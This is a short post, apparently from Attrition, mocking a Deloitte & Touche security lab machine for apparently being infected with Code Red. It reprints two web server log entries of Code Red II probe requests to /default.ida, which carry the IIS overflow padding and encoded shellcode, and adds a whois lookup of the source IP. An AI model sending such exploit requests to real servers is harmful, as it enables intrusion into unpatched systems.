Seems a machine at the Deloitte & Touche Security lab was infeced with the Code Red worm or a variant. Not very smart.

Code Red II Probe
208.225.230.158  - - [21/Aug/2001:13:42:26 -0600] GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3
%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0 404 2421 - -  

Code Red II Probe
208.225.230.158  - - [21/Aug/2001:02:37:31 -0600] GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3
%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0 404 2403 - -  

forced /home/# jwhois 208.225.230.158 
[whois.arin.net]
UUNET Technologies, Inc. (NETBLK-UUNET1996B) UUNET1996B
                          208.192.0.0 - 208.255.255.255
Deloitte & Touche Security Services (NETBLK-UU-208-225-230-128) UU-208-225-230-128
                          208.225.230.128 - 208.225.230.191
main page ATTRITION feedback